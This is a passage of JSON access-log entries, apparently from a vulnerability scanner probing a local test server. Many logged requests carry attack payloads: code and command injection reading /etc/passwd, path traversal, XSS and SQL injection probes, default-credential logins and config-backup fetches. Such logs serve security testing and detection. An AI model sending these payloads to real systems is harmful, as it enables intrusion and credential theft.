/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /thruk/cgi-bin/login.cgi?thruk/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config-backup.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29KFpYdF8n04OB8AtwZg15N6sZT')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/snyk.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pools/default/buckets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_notes/dwsync.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"username=admin&password=gophish&csrf_token={{replace(url_encode(html_unescape(csrf_token)), \x22+\x22, \x22%2B\x22)}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29KFpYdF8n04OB8AtwZg15N6sZT')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"29KFpcxjk4y4pE5kuOKaggLF9Vm","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat+%2Fetc%2Fpasswd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///////../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22userReference\x22:{},\x22loginReference\x22:{\x22link\x22:\x22http://localhost/mgmt/shared/gossip\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/shared/authn/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"proId=1'&addToCart=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /action.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php~ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email/unsubscribed?email=test@gmail.com%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 